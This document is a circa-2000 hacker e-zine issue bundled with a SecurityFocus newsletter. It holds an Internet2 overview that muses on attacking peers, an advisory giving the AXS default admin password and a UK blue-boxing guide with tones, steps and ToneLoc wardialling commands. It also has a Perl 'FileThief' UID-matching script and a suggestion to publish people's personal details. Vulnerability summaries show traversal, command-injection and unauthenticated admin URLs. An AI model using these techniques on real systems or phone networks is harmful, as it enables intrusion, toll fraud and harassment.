for the vBNS. I guess the US GOV and academic establishments realized
that the US wasn't exactly the smartest country on the planet. The
International peers connect through the STARTAP and connect from there to
other i2 or NGI peers. STARTAP (Science, Technology, And Research Transit
Access Point) is the International NAP for most US networks (other than
the Internet). The STARTAP connects directly to the Ameritech NAP in
Chicago which connects to the vBNS and many other high speed US networks.
The STARTAP is funded by the NSF and maintained by the University of
Illinois at Chicago and a few other Chicago based groups. The STARTAP
currently supports speeds up to OC-12 and supports DiffServ, RSVP,
Multicasting and IPv6. For more information on the STARTAP check out:
www.startap.net
The following are just a few examples of International networks are
hooking up to i2 or NGI through the STARTAP.
>> Israel's tap
The Israeli government has committed $10 million a year for the next four
years towards advanced network development in Israel. The group in charge
of all i2 and NGI activities is the IUCC (Israel Inter-University
Computation Center) whose main members are the eight major universities
in Israel. This is where it will start, with the Universities, and then
shortly after it should be open to commercial R&D departments.
There is one Satellite link at 44mbps from Israel (Tel Aviv University)
to the STARTAP in Chicago US. Israel bought the entire spectrum on the
sat so there are plans for upgrading that speed anywhere from 60mbps to
140mbps, as needed. There is also a fiber optic E3 (34mbps) line from
Israel (Bar Ilan U. I believe) to the UK where it connects to the QUANTUM
network in Europe (http://www.dante.net/quantum). After that there is
another fiber optic line going from the connection point in the UK over
to the US at 10mbps for redundancy.
I've heard rumors of a 2gbps line being setup from the US to Israel but I
have not been able to confirm this.
Though the i2 website for the IUCC claims full support for QoS, I don't
believe it. At an i2/NGI conference I went to I asked one of the IUCC
speakers about this and he gave no real assurances for QoS support, quite
the opposite.
For more information on the i2 project in Israel go to
www.internet-2.org.il
>> CA*NET3
CA*NET3 currently runs at OC-48 (2.5gbps). The Canadian government in
partner with some High Tech companies funds the project. NAP's to the
backbone are located all along the southern border of Canada and connects
to other US networks through the STARTAP. The Canadian Government has
committed $53 million to the project which will last a year or so (don't
remember the exacts). The project was initiated in 1998. CA*NET3 uses
DWDM (Dense Wavelength Division Multiplexing) to get to OC-48. CANARIE
(Canadian Network for the Advancement of Research, Industry and
Education) is the group in charge of the project and for more info check
out their site at: www.canarie.ca or www.canet3.net. The CANARIE
consortium includes commercial, academic and governmental departments of
Canada.
IV. Security concerns
------------------------------------------------------------------------
There are a couple of security concerns as I see it. The first is about
the way most universities and organizations make requests to plug up to
i2 or NGI. They create a proposal and many will list, in great detail,
the details of their network. One sad sight I saw was the San Diego
Supercomputer Center which posted a map of all the IP NetID's for its
network. Even worse was CANARIE which posted the same thing (the NetID's)
for the entire CA*NET3 backbone. Now, these are private networks.
However, all I would need, in theory, is a terminal at a i2 or NGI peer
to start playing around. It seams even easier when I start to really look
at their proposals. Most peers make the default path their NGI or i2
connection when the destination is another i2 or NGI peer, even for
something as simple as a webpage. So, depending on how it is implemented
I may be able to just start from a simple Student terminal, as opposed to
having to hack into the Systems group terminals or servers first.
The second is concerning DoS attacks. Give me bandwidth and I'm in DoS
heaven :) On a i2 or NGI peer's network I may have allot of bandwidth at
my disposal (depending on what type of policy they come under when
connecting to i2 or NGI backbones). Then, if I find a peer stupid enough
with a proxy from there to the normal Internet, who knows.
And I'm only a nominal security buff, I imagine that there are allot more
concerns that I haven't seen. There is, however, a IETF Security
Workgroup in place for this exact reason. So, who knows?
If you have any questions, comments, corrections...
e-mail me at: mindmore@mindless.com
I will try to post any technical corrections in the next issue of this
e-zine.
- Cyphunk
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
------------------------------------------------+
|
------------------------------------- |
AXS Script Makes WebServer Vulnerable |
------------------------------------- |
|
--- by f0bic - [ linux security ] |
--- f0bic@deadprotocol.org |
(this article was also published on BugTraq) |
________ |
[_______________________________________|
-----------------
Brief Description
-----------------
The AXS webserver script by Fluid Dynamics(www.xav.com) allows unauthorized third party
users to make use of the ax-admin Administration/Configuration module and remotely edit and/or
delete log files and overwriting files on the system. System resources compromization might also
be one of the effects of this vulnerability.
--------------------
Vulnerable Platforms
--------------------
Any operating system AXS is compatible with.
- *NIX Operating Systems (AXS cgi set)
- WindowsNT Operating System (AXS perl set)
I have seen the AXS
( cgi set ) operate on Apache 1.2.6/1.3.3, NCSA, Netscape-Commerce.
( perl set ) operate on IIS 3.0/4.0, Netscape-Fasttrack.
-------------------------
Vulnerability Description
-------------------------
The AXS Script, which is a cgi or perl script that keeps track of the number, the source
locations, the clientinfo of visitors to your http port(80). It writes this data to an output
file, named log.txt by default (but it can easily be relocated). This log.txt is normally
located in the cgi-bin directory of the server, allowing write access to this directory.
The AXS cgi script contains two .cgi appended files; ax.cgi and ax-admin.cgi respectively.
The ax.cgi file is the one that actually "grabs" the info about the visitors and then writes
them to log.txt (or wherever you relocated this too). The ax-admin.cgi is the the configuration
file for the ax.cgi script. The ax-admin.cgi is default passworded by "IronMan" and sometimes
is even left blank. Due to this weak access security it is very easy to gain "configuration access"
to the ax.cgi script, allowing you to reconfigure it, delete the log files, change the location of the logs.
The default location for the AXS script is http://www.server.com/cgi-bin/ax.cgi.
The default location for the AXS Admin script is http://www.server.com/cgi-bin/ax-admin.cgi.
To obtain access to the ax-admin.cgi module by default you get a password screen issued, Ironman
being the default password. The password is determined by the characters in the $password="*"
field of the ax-admin.cgi hardcode ("*" being a the default/chosen password or a blank). Most of the
time I have seen the password field to be left blank or defaulted. If the password is left blank you
will not be prompted for a login screen, instead it will automatically drop you into the ax-admin
configuration page. From this point on you can alter files on the server system, possibly resulting
in Denial-of-Service attacks against the system's resources.
---------
Solutions
---------
The AXS problems relate to a lack of resources that could suffice for secure business applications.
The AXS script on the other hand has been developed for ease of use, not for trouble of security;
this is one of the mistakes that Fluid Dynamics has made. The easy way is not to run with none or
default password on the ax-admin.cgi module. I have informed Fluid Dynamics about the fact that I
have seen servers where the ax-admin password was the same as the one for a valid shell account on
that system. Fluid Dynamics has also gone trough no trouble at all to encrypt any of the passwords
used in the ax-admin verification.
EOF
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+--------------------------+
| PURSUiT presentation, |
| |
| Boxing in the UK |
| |
| By Oktal |
| |
| <ms@punkass.com> |
+--------------------------+
Part 1. Blue Boxing
Part 2 will be on Beige Boxing and will be in the issue 3 of PURSUiT
Blue boxing is sending noises down a fone line to sieze the trunk and make
free fone calls (among other things). The trunk is where operators dial from.
But they don't use the same frequencies as home fones, so we need to get
the tones from your soundcard to the fone line.
What you will need for this hobby:
1 Computer + Sound card
1 Tone-generating software (eg. http://x-iz.net/gbh/bluebeep.zip)
1 Cheap telephone (I use the old 'Viscount' series by BT because I have a
friend who has loads he doesn't want)
4 Wires (at least 1 metre each)
2 2.5mm jack plugs (from your local electrical shop)
1 Hole-making equipment (hammer+nail)
1 Soldering iron + solder (optional)
What you must do for this hobby:
Open up the handset so you can see all the insides. There should be a
speaker and a microphone, each with 2 wires connecting into them.
Attach (or solder) one of your 4 wires to each of the wires in the handset.
Now make a hole in the casing for the wires to emerge from.
Open up the jack plugs and attach the 2 wires from the speaker to the
connections in one plug and and 2 wires from the mic to the connections
in the other plug. Use solder if you want. Stick the handset back together.
Disconnect the speakers and microphone from your computer and plug the
earpiece into the microphone socket and the mouthpiece into the speaker
socket.
-OR- If you have electrical knowledge, you could make a box that generates
the tones by its self and doesn't need connection to a soundcard.
A long time ago, BT had a tone (2280hz) which was used by BT engineers to
access cirtain funtions within the trunk. Phreakers discovered that this
could be abused to sieze the trunk and make free calls out of it. But BT
got wise to the phreakers so now blue boxing is impossible in the UK.
But BT does have 'country direct' lines which are freefone 0800 numbers to
overseas. They are mostly in the 0800 890 XXX range along with some other
useful numbers. These countries' exchanges are not as modern as here and they
are blue boxable. (NB: not all country direct lines are boxable)
Some country direct numbers to countries with CCITT-5 lines:
South Africa 0800 890 027
Germany 0800 890 049
Brazil 0800 890 055
Chilie 0800 890 056
Libia 0800 890 059
Australia 0800 890 061
Indonesia 0800 890 062
French 0800 890 133
Bahamas 0800 890 135
Gabon 0800 890 241
etc etc etc
You can then make an international call out of that country
to the UK (or any other country) and make a free call.
Using Bluebeep by Onkel Dittmeyer:
The 'action mode' sucks so you should program a script to play the
tones. A sample (and very good) script that I made is included in
the zip file (http://x-iz.net/gbh/bluebeep.zip)
To make your own script to your own needs, read 'Script Language'
from the Info|Documentation menu.
To run a script, type BLUEBEEP /EXEC FILENAME.EXT from the prompt.
For a list of all the command-line switches, type BLUEBEEP /?
Tone specifications for the CCITT-5 exchange:
Description Frequency (Hz) Duration (ms) Pause after tone (ms)
digit 1 700 & 900 60 40
digit 2 700 & 1100 60 40
digit 3 900 & 1100 60 40
digit 4 700 & 1300 60 40
digit 5 900 & 1300 60 40
digit 6 1100 & 1300 60 40
digit 7 700 & 1500 60 40
digit 8 900 & 1500 60 40
digit 9 1100 & 1500 60 40
digit 0 1300 & 1500 60 40
KP1 1100 & 1700 80 40
KP2 1300 & 1700 80 40
ST 1500 & 1700 80 80
Clear Ahead Tone 2400 & 2600 150 30
Seize Tone 2600 & 2600 80 20
Be aware that duration times may differ slightly with the exchange.
To sieze the trunk of a CCITT-5 line:
1. You will hear a bleep after you dial the country direct number
2. Send the clear ahead tone after that bleep (makes it think you've hung up)
3. Then Send the sieze tone (so it thinks it's talking to the telco equipment)
4. You will hear a bleep and a chunk
5. Dial the number as shown:
KP2+Zero+CountryCode+AreaCode+Number+ST
eg. KP2,0441818118181,ST
But BT often put filters on the country direct lines to filter out
these tones. Here are some tricks to get past a lot of filters:
The average tone of a conversation is around 3000 Hz. This is called
'pink noise'. Bluebeep allows 3 simultaneous tones, so add 3000 Hz
to the last frequency of each tone in the dial set list.
Some filters raise or lower the pitch of the sound slightly.
Try tones just above or just below the given frequencies.
(eg. 2395 or 2405 instead of 2400)
You may have to do some freqency analysis on the echo you get from the system.
A good tool for this is Wintone (30-day trial version at www.steaksandwich.com,
registration $20 (�13), or you could read my article on cracking software,
which will be coming soon in PURSUiT)
That's it guys. Any information you may have on UK boxing can be sent to
ms@punkass.com for a great big essay i have planned for the mag next year
on UK boxing. Remember part 2 of this article (beige boxing) is in issue 2.
Wardialling & Scanning
If a country direct number is abused too much then BT is forced to
shut it down :(
So every so often the one you use will go away and you'll have to
use another. Well, the list above is by no means complete. And there
are other very useful numbers in the 0800 890 XXX range, so...
Why not find out what they all are?
"What, scan 1000 numbers???"
No... you get a wardialler to do that for you. It dials them all up
(don't do this all at once, BT'll notice) and when you come back
it'll tell you which ones picked up and which ones didn't exist.
(it might also tell you if it was a data or voice line)
Then you can dial the ones that look interesting.
You just tell it what range to scan and leave it for a while.
You could also be at your deak while the dialler is running so you
can listen to them and take note of what the voice ones are, like
"voice: "Mark at reception how may I help you?"
A good wardialler is ToneLoc at http://x-iz.net/gbh/toneloc.zip
Example ToneLoc Syntax:
C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /S:3:00a /E:4:00a
will dial 0800890000, 0800890001, 0800890002... 0800890999
starting at 3 am and ending at 4 am (regardless of how far thru the
scan it has got)
C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /H:1:00
will scan the range starting NOW and ending in one hour
Toneloc also has some cool options like Black Book; A txt file of
numbers to NEVER dial (eg. 999) during a scan and loads of other cool stuff.
To setup options like that and config stuff like modem strings, run
TLCFG.EXE
A really neat trick is the Scan Map. I can't explain it, it is just
so great. Run TONEMAP SAMPLE.DAT to see what I mean.
EOF
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
*-------------------------------*
| PURSUiT is proud to present.. |
| |
| Introduction to Firewalls |
| |
| By deadline |
*-------------------------------*
What is a firewall?
---------------------
A firewall is a system or group of systems that enforces an access control
policy between two networks. The actual means by which this happens
varies widely, but in principle, the firewall can be thought
of as a pair of mechanisms, one that is there to block traffic, and the
other which permits traffic. Some firewalls place a greater
emphasis on only blocking traffic, while others are strictly for permitting traffic.
Diagram:
O = Outside Host 1: packets to the firewall
F = Firewall/Router 2: firewall accepts or denys
I = Internal Network 3: packets go to host
(3) IIII
|-----IIII
(2) |
(1) FFFFF-| (3)
OOOO-------FFFFF-------IIII
OOOO FFFFF-| IIII
| (3)
|-----IIII
IIII
Protection
--------------
Firewalls offer protection against many kinds of things. They offer
protection from malicious packets, e-mail spam/bombs, and also, intruders
to your system. But their is also attacks Firewalls CANNOT protect u
against (attacks that dont go threw the firewall) like people from inside
the network, and from there, that user can give access to outside
networks, which can be potentionally dangerous to your network. And
lastly, Firewalls cant protect against tunneling over application
protocols to trojaned or poorly written clients.
Types of Firewalls
--------------------
1: Network Layer
------------------
Network firewalls usually make there desicions based on address (source)
and the ports of a packet. Routers are probably the most known network
level firewall, because its not able to make a great decision about where
the packet is actually going or where it came from. Newer network firewalls
have increased greatly in maintaining information about the packets that
pass threw them, contents of data streams, and other sources of information.
A imporant thing to remember is that network firewalls route traffic directly
threw them, so to use one you usually need to have a validly assigned IP address
block. Network firewalls usually are fast and transparent to users.
2: Application Layer
----------------------
Application level firewalls are usually a host running proxy servers.
The proxy server usually permit no traffic directly between networks
and give a more detailed log of traffic then the Network level firewalls.
These firewalls can be used as network address translators, since packets
go "in one side and out the other", after passing threw a application
that effectivly masks the origin of the initiating connection.
Proxy Servers
---------------
A proxy server is a application that mediates traffic between a protected
network and the Internet, meaning it only allows specific connections to
connect to the host, and allows only connections out of the host threw specified
ports. Proxys are usually used instead of router based traffic controls, because they
prevent traffic from passing directly between two network. Alot of proxys
have more logging and support for the user authentication. Because proxys must
understand the application protocol being used, they can also implement protocol
specific security, where as only certin prototcols are allowed to be incoming
and outgoing from a host.
Firewall Downsides
--------------------
Firewalls while restricting access from outside attacks. Also restricts
users inside the network to connect to some/maybe even all networks
outside the current one. This means, a user in the secure network, may not
be able to connect to lets say www.linux.org unless he has the permissions
to. This also is the same for ftp, telnet, and other various network
utilities.
EOF
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
]--------------------------------[
[ FileThief.pl ]
]--------------------------------[
[ Developed By ]
]--------------------------------[
[ Mister-X (Admin@x-iz.net) ]
[ Alkatraz (funnet@icom-web.com) ]
]--------------------------------[
For those of you who cant tell what this script does by looking at the
source code. It scans /etc/passwd for users with the same UID as your own.
If it finds them it reports to STDOUT and log to a file, for later browsing.
Yes, it is a common occurance for slack admins to add users with the same
UID meaning that you have full access to their files.
PERL Script Follows:
#!/usr/bin/perl
($myusr, undef, $id, undef, undef, undef, undef, $hdir, undef) = getpwnam(getlogin);
$fid = time."-$id";
print "Welcome to filethief - searching for $id in /etc/passwd.\n";
$myusr = getlogin;
$found = 0;
open(logf, ">>$hdir/filethief-$fid.log");
open(pwd, "</etc/passwd");
while(<pwd>) {
local($usr, undef, $uid, undef) = split(/:/, $_, 4);
if(($uid eq $id) && ($usr ne $myusr)) {
$found++;
print logf "$usr has the same ID as $myusr ($id).\n";
}
}
close(pwd);
if($found eq 0) {
print logf "\nNo matches were found at ".localtime(time)."\n";
} else {
print logf "Found [$found] matches at ".localtime(time)."\n";
}
close(logf);
open(logf, "<$hdir/filethief-$fid.log");
while(<logf>) { print; }
close(logf);
exit(1);
EOF
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
iuuiuuiu
uiuiu uiu i I I
iu uiu yi BI BI
iu uiu i yi I BI
iu ui yi yi BI
uiuuiuui y yi yi BI
iuu yi yi iyi BIB
iu yi yiyi BI BI BI
iu yi yi BIBIBI BI
uiu
[ PURSUiT News Update ]
Well after all, that's the first issue of PURSUiT, so we have
no news to talk about, so we will use this space for ideas,
future features and other things.
Stuff we had on mind:
---------------------
1. Lamer list
This was the idea of one of us, just to take out rage on people
that keep on bugging us, or just for the fun of it. If we will
include it in the future, I belive it won't be serious, just to
have some laughs the night after it on IRC ;)
2. Shouts
It's my idea mostly, though I think it won't be included. If it
will, we will probably use it to thank people who helped putting
out the zine, reviewed it, made some corrections etc.
3. Docs exposing
Now this idea came through an anonymous source, which suggested
that PURSUiT could drop docs of a few people here and then. The
people we had on mind are mostly the ones that everyone hates,
(I won't declare them here :) but we first need to get the docs,
so it might not go.
4. Questions\Answers section
This is mostly self explained, a section or column, where people
will be able to email us and we will answer the question over
the zine, so that other people could know the answer too. If we
will get enough response for that, we might do it.
That's it for now, if you have other suggestions, ideas, or features
you belive we should include just email us to:
bxj - <bxj@mail.com>
f0bic - <f0bic@deadprotocol.org>
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU
iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR
SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Well, we all hope you enjoyed the first issue of PURSUiT.
Remember, you can always catch us on IRC, or email us.
EOF
@HWA
115.0 SecurityFocus.com Newsletter 33
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SecurityFocus.com, the premier security information portal, has a
completely new look and more in-depth security content! As part of our
new site we have a free service which allows Solaris users determine their
security posture take a look at:
http://www.securityfocus.com/sun/vulncalc
SecurityFocus.com - It's all here and it's all free.
I. FRONT AND CENTER
1. Info.Sec.Radio to interview head of Technical Security Branch
of Canada's Federal Police Force, the RCMP.
II. BUGTRAQ SUMMARY
1. Linux atsar Input Validation Vulnerability
2. RealServer Internal IP Address Disclosure Vulnerability
3. NT Automated Tasks / Drive Mappings Vulnerability
4. Atrium Software Mercur Mail Server 3.2 Buffer Overflow
Vulnerability
5. Sojourn File Access Vulnerability
6. Oracle Web Listener Batch File Vulnerability
7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability
8. Microsoft SQL Weak Password Encryption Vulnerability
9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow
Vulnerability
10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
III. SECURITYFOCUS.COM TOP 6 NEWS ARTICLESS
1. The Coming Linux Plague (March 13, 2000)
2. The Fine Print in UCITA (March 16, 2000)
3. Sex Site Billing Companies Targeted By Russian Cybercrime
(March 13, 2000)
4. Information Freedom Catching On (March 16, 2000)
5. Vast online credit card theft revealed (March 17, 2000)
6. Hacker Finds a New Home for Stolen Cards (March 17, 2000) IV.
INCIDENTS SUMMARY
1. Munged Napster Sessions (Thread)
2. Undernet/telnet attempts? (Thread)
3. Strange RPC? service entries. (Thread)
4. ingreslock message (Thread)
5. lots of interest in port 109 (POP2) (Thread)
6. Mail and web server attack (Thread)
7. Firewall (Thread)
8. TCP port 3218 (Thread)
9. Odd UPD scan (Thread)
10. DUP packet replies at tvguide.com (Thread)
11. Cracked; rootkit - entrapment question? (Thread)
12. pop-2 scanning (Thread)
13. Looking for Squid Proxies (Thread)
14. TCP port 3218 (Thread)
15. what are these? (Thread)
V. VULN-DEV RESEARCH LIST SUMMARY
1. Unwanted automagic processing (Thread)
2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread)
3. Hotline (Thread)
4. Crashing Win9x (Thread)
5. NT 4.0 (Workstation) Logon Authentication Vulnerability
(Thread)
6. Crashing Win9x with smbclient (Thread)
7. Intel Corporation, Express 550 (Thread)
8. spoofing the ethernet address (Thread)
9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread)
10. Exploiting any network protocol with secondary data channels
(Thread)
11. Buffer overflow in AIM 3.5.1856 (Thread)
VI. SECURITY JOBS
VII. SECURITY SURVEY RESULTS
1. Which remote accessing service presents the greatest security
risks?
VIII. SECURITY FOCUS TOP 6 TOOLS
1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
2. SecurityFocus.com Pager (Win95/98/NT)
3. Cold Fusion Scan 1.0 (Win95/98/NT)
4. Atlas 1.0 (Win95/98)
5. kfirewall 0.4.2 (Linux)
6. cgi scanner 3.6 (UNIX/PERL)
IX. SPONSOR INFORMATION - SecurityFocus.com
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
I. FRONT AND CENTER
-------------------
1. Info.Sec.Radio to interview head of Technical Security Branch of
Canada's Federal Police Force, the RCMP
The show airs on Monday March 20 at 10am PST, 11am MST, 1pm EST.
http://www.securityfocus.com/radio/
II. BUGTRAQ SUMMARY 2000-03-13 to 2000-03-20
---------------------------------------------
1. Linux atsar Input Validation Vulnerability
BugTraq ID: 1048
Remote: No
Date Published: 2000-03-11
Relevant URL:
http://www.securityfocus.com/bid/1048
Summary:
atsar is a linux load monitoring software package released under the GPL
by AT Computing. atsadc is a setuid root binary that is included in the
atsar package. atsadc will accept as an argument an output file, which it
will open -- without checking to make sure the user executing atsadc has
the priviliges to do so. After it has opened and created (or overwritten)
the target file as root, the permissions set on the file will allow the
attacker to write to it. Since this file is arbitrary, it is possible to
gain root locally in any number of ways through creating malicious system
files. In Teso's proof of concept exploit, root priviliges are gained by
creating a malicious shared library to be preloaded and
creating/specifying that library in /etc/ld.so.preload (and then executing
a setuid binary..).
2. RealServer Internal IP Address Disclosure Vulnerability
BugTraq ID: 1049
Remote: Yes
Date Published: 2000-03-08
Relevant URL:
http://www.securityfocus.com/bid/1049
Summary:
By default, Real Server includes the IP address of the server in data sent
to the client. If the Real Server is installed on a machine in a NAT
environment, (where requests from the outside network are handled by
reverse proxy), this will reveal what are supposed to be private, hidden
IP addresses.
3. NT Automated Tasks / Drive Mappings Vulnerability
BugTraq ID: 1050
Remote: No
Date Published: 2000-03-14
Relevant URL:
http://www.securityfocus.com/bid/1050
Summary:
Any automated task that relies on mapped drives and runs at a higher
privelege level than the logged-on user can be exploited by changing the
drive mapping. By replicating the directory structure of the intended
drive, and replacing the contents of the scheduled executables or
configuration files with other data, it is possible for a local attacker
to cause arbitrary code to be executed at an elevated privelege level.
For example:
\\Workstation has the following drive mapping:
S: \\Server\Scripts
and there is an AT job that runs S:\Daily.bat every day as the Local Administrator.
Now all the attacker has to do is replace the S: mapping with one that
specifies a target where the attacker has write privileges
(\\Workstation\C$ for example). Then if the batch file C:\Daily.bat is
created, it will be run as Local Administrator.
4. Atrium Software Mercur Mail Server 3.2 Buffer Overflow Vulnerability
BugTraq ID: 1051
Remote: Yes
Date Published: 2000-03-14
Relevant URL:
http://www.securityfocus.com/bid/1051
Summary:
Atrium Software Mercur is a SMTP, POP3, and IMAP mail server.
Insufficient boundary checking exists within the login command, causing
the application to crash if a string consisting of over 3000 characters is
used as a username. This affects both the POP3 and IMAP server in the
Mercur mail server suite.
5. Sojourn File Access Vulnerability
BugTraq ID: 1052
Remote: Yes
Date Published: 2000-03-14
Relevant URL:
http://www.securityfocus.com/bid/1052
Summary:
Any file that the webserver has read access to can be read on a server
running the Sojourn search engine.
The Sojourn software includes the ability to organize a website into
categories. These categories can then be accessed via the sojourn.cgi Perl
script. This is done by making a request for a URL like:
http ://target/cgi-bin/sojourn.cgi?cat=categoryname
Each category has an associated .txt file based on the category name. The
program appends the .txt extension onto the contents of the 'cat'
variable. However, the program will accept and follow the '../' string in
the variable contents, allowing read access to any .txt file the webserver
can read.
This restriction can be bypassed by appending %00 to the end of the
requested file, which will prevent the .txt extension from being used in
the filename.
6. Oracle Web Listener Batch File Vulnerability BugTraq ID: 1053 Remote:
Yes Date Published: 2000-03-15 Relevant URL:
http://www.securityfocus.com/bid/1053 Summary:
Oracle Web Listener for NT makes use of various batch files as cgi
scripts, which are stored in the /ows-bin/ directory by default.
Any of these batch files can be used to run arbitrary commands on the
server, simply by appending '?&' and a command to the filename. The
command will be run at the SYSTEM level. The name of a batch file is not
even neccessary, as it will translate the '*' character and apply the
appended string to every batch file in the directory. Moreover, UNC paths
can be used to cause the server to download and execute remote code.
7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability
BugTraq ID: 1054
Remote: Yes
Date Published: 2000-03-11
Relevant URL:
http://www.securityfocus.com/bid/1054
Summary:
A vulnerability exists in which Checkpoint Firewall-1 will expose internal
addresses to machines outside the network. Under seemingly normal load
conditions, according to the poster of this vulnerability, 40% CPU
utilization with 200+ active connections, Firewall-1 will attempt to
establish connections utilizing the internal address. As this address is
either non-routable, or internal, a retransmission will occur; this packet
will have the correct address rewritten, but will use the same source
port. Using this information makes it easy to determine the firewall
behind which this address resides, as well as the internal address of the
machine being utilized to establish the connection being seen. This may be
particularly useful to attackers conducting client side attacks.
These problems have been seen on both NT and Solaris versions of FW-1,
although the poster indicated that not enough data was available to
directly state the Solaris version was vulnerable in the same ways, or to
the same degrees.
8. Microsoft SQL Weak Password Encryption Vulnerability
BugTraq ID: 1055
Remote: No
Date Published: 2000-03-14
Relevant URL:
http://www.securityfocus.com/bid/1055
Summary:
If 'Always prompt for login name and password' is not set, and Windows
Integrated Security is not being used, Enterprise Manager for SQL Server 7
will save the login ID and password in the registry key
HKCU\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server X. The
algorithm used to encrypt the password consists of XORing each character
with a two byte value dependant on the character's position in the string.
If 'Always prompt for login name and password' is set, or Windows
Integrated Security is used, the ID and password are not saved at all.
9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability
BugTraq ID: 1056
Remote: Yes
Date Published: 2000-03-16
Relevant URL:
http://www.securityfocus.com/bid/1056
Summary:
WebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail
Server which allows a user to access email through a web browser.
Insufficient boundary checking exists in the code which handles GET
requests, specifically on port 1080. Issuing a GET request containing a
string of over 1000 characters on port 1080 will cause the WebView
WebMail-Client application to crash.
eg.
http: file://target/&mail_user=<string containing over 1000 characters>
10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
BugTraq ID: 1057
Remote: Yes
Date Published: 2000-03-16
Relevant URL:
http://www.securityfocus.com/bid/1057
Summary:
Trend Micro OfficeScan is an antivirus software program which is
deployable across an entire network. During the installation of the
management software, the administrator is asked to choose between managing
from a webserver or from a fileserver. If the webserver option is chosen,
the administrator is given the capability to manage the OfficeScan network
through an HTML interface. This can be accessed by requesting the
authentication form which is located at http: file://target/officescan/. It
prompts the user for the admin password, however it is transmitted in
plaintext which can be intercepted by any user on the network running a
packet sniffer specifically searching for the string "TMLogon=<password>".
A larger problem exists in that any user with access to the web server is
able to perform administrative functions without any sort of authorization
simply by requesting specific URLs. This is accomplished by requesting
certain CGI files such as jdkRqNotify.exe. A request for jdkRqNotify.exe
in conjunction with a domain name on the network and an administrative
event code number would allow any user on the network to perform certain
administrative duties.
eg.
http://target/officescan/cgi/jdkRqNotify.exe?domain=<domain name>&event=<event code number>
Examples of event code numbers are:
11: Scan now
12: Uninstall
14: Roll back
15: New alert message
16: New intranet proxy
17: New privilege
18: New protocol
19: New password
20: New client
III. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
--------------------------------------------
1. The Coming Linux Plague (March 13, 2000)
URL:
http://www.securityfocus.com/commentary/2
2. The Fine Print in UCITA (March 16, 2000)
URL:
http://www.securityfocus.com/commentary/4
3. Sex Site Billing Companies Targeted By Russian Cybercrime (March 13,
2000) URL:
http://www.securityfocus.com/news/3
4. Information Freedom Catching On (March 16, 2000)
URL:
http://www.securityfocus.com/news/5
5. Vast online credit card theft revealed (March 17, 2000)
URL:
http://www.msnbc.com/news/382561.asp
6. Hacker Finds a New Home for Stolen Cards (March 17, 2000)
URL:
http://www.internetnews.com/ec-news/article/0,1087,4_323241,00.html
IV. INCIDENTS SUMMARY
----------------------
1. Munged Napster Sessions (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314021712.CF91B106FB@schadenfreude.meshuggeneh.net
2. Undernet/telnet attempts? (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=75B741AEA780D3118D6500508B4499A001965C75@cadillac.office.wxs.nl
3. Strange RPC? service entries. (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313095534.5770.0@argo.troja.mff.cuni.cz
4. ingreslock message (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=38CD2727.26D3F760@RZ.RWTH-Aachen.DE
5. lots of interest in port 109 (POP2) (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313205308.24475.qmail@securityfocus.com
6. Mail and web server attack (Thread)
URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314135432.1709.qmail@securityfocus.com
7. Firewall (Thread)
URL:
